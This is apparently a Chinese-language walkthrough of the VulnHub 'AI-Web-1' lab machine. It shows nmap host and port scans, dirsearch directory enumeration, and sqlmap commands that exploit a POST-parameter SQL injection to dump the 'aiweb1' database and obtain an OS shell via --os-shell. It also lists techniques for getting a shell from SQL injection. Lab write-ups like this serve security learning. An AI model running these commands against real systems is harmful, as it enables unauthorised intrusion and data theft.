AI-Web-1 靶场

admin 2024年11月1日14:17:42评论7 views字数 2071阅读6分54秒阅读模式

AI-Web-1 靶场  

下载链接:https://www.vulnhub.com/entry/ai-web-1,353/

             AI-Web-1 靶场

下载完成

AI-Web-1 靶场

创个文件夹放进去解压

虚拟机搭建环境  

点击文件-》打开-》找到你解压的文件打开  

AI-Web-1 靶场

AI-Web-1 靶场

开机  

AI-Web-1 靶场

AI-Web-1 靶场

什么什么登陆创建完成

寻找靶机ip地址  

一样的,环境搭好了,但是啥也没有,先找他的ip

点击你的靶场虚拟机-》右键-》设置-》网络适配器-》网络连接

(查看当前虚拟机的网络模式,这里是NAT模式)

AI-Web-1 靶场

然后点击高级-》有个MAC地址,记下来 待会儿有用

AI-Web-1 靶场

知道了该靶场网络模式为NAT模式还知道了 MAC地址

点击你VMware导航栏的编辑-》虚拟网络编辑器-》点击更改设置

AI-Web-1 靶场

选择NAT模式,下方有个该模式下自动分配的ip地址段

(靶机的网络模式也是NAT,所以靶机的ip地址,就是该网段中的一个)

AI-Web-1 靶场

开启kali 网络模式设置为NAT模式,确保kali和靶机在同一个网段可以通信

namp扫描整个网段,探测存活的主机(目的是为了找到靶机ip)

nmap 192.168.3.0/24//扫描整个网段            

AI-Web-1 靶场

扫描出来的结果不止一个,这个时候之前保存的MAC地址,就有用了,用来对比找出靶机ip

AI-Web-1 靶场

找出ip,继续扫端口,查看开放了那些服务

nmap 192.168.3.130 -p-//全端口扫描            

AI-Web-1 靶场

开放了一个80端口,本机浏览器访问看看  

AI-Web-1 靶场

啥也没有,扫描目录。顺带看看robots.txt文件能不能访问

AI-Web-1 靶场

有东西,得到俩子目录,拼接访问看看

AI-Web-1 靶场

AI-Web-1 靶场

艹,******

             AI-Web-1 靶场

看看目录扫描,扫出来了什么

dirsearch -u "http://192.168.3.130"            

AI-Web-1 靶场

emmm,我直呼好家伙,这不是相当于还是啥也没有

等等

把刚才得到的二级目录挂上去,再梭一口

dirsearch -u "http://192.168.3.130/m3diNf0/"            

AI-Web-1 靶场

有个info.php访问看看

AI-Web-1 靶场

再换个目录梭

dirsearch -u "http://192.168.3.130/se3reTdir777/uploads/"            
别看了,没扫出来            
           
退一级目录,再扫            
dirsearch -u "192.168.3.130/se3reTdir777/"            

然后,还真别说,扫出来了,访问

AI-Web-1 靶场

然后。。。

AI-Web-1 靶场

             AI-Web-1 靶场

啊?什么情况?

然后开始百度找教程,以及别人的复现过程。(不是,他们怎么没有这一步?经过我的不懈努力,没找到)

(还得问问大佬,去问老师。好像是虚拟机环境错了,卸载重装靶机环境)

我把靶机环境移除,在重新打开,页面出来了。。。

AI-Web-1 靶场

继续继续  

提交id 获取信息 提交一个1,

AI-Web-1 靶场

更改id值为2提交,返回的内容也变了,也就是说id值被带入执行了

AI-Web-1 靶场

试试提交1',页面报错。存在SQL注入

AI-Web-1 靶场

提交的参数不在URL中,post提交方式,抓包看看

AI-Web-1 靶场

SQLmap工具梭哈  

sqlmap -u "http://192.168.3.130/se3reTdir777/index.php#" -data "uid=1&Operation=Submit" --dbs            
           
解释一下:-u 指定一个url目标 、-data 通过post方式发送数据字符串 、--dbs 列出数据库            

AI-Web-1 靶场

查看aiweb1数据库下的表

sqlmap -u "http://192.168.3.130/se3reTdir777/index.php#" -data "uid=1&Operation=Submit" -D aiweb1 --tables            

AI-Web-1 靶场

查看指定表下的数据

sqlmap -u "http://192.168.3.130/se3reTdir777/index.php#" -data "uid=1&Operation=Submit" -D aiweb1 -T user --dump            

AI-Web-1 靶场

得到数据,但都不是靶机的登录信息

还记的之前出现的phpinfo页面吗?页面中暴露了网站的绝对路径,那我们就可以利用sqlmap拿shell

SQL注入拿shell的方式  

1.unselect + into outfile            
2.SQLmap(--os-shell)            
3.日志写入            
4.堆叠写入            
等            

查看网站的绝对路径  

AI-Web-1 靶场

参数 --os-shell  

sqlmap -u "http://192.168.3.130/se3reTdir777/index.php#" -data "uid=1&Operation=Submit" --level=3 --os-shell            
level指定数据库为mysql,级别为3            

可还记得这个

显示中有一个什么什么uploads,一个文件上传的目录

AI-Web-1 靶场

和我们获得的网站绝对路径拼接一下

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/            
           
用此绝对路径配合SQLmap,getshell            

AI-Web-1 靶场

原文始发于微信公众号(小白摸坑学网安):AI-Web-1 靶场

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月1日14:17:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   AI-Web-1 靶场http://cn-sec.com/archives/2493398.html

发表评论

匿名网友 填写信息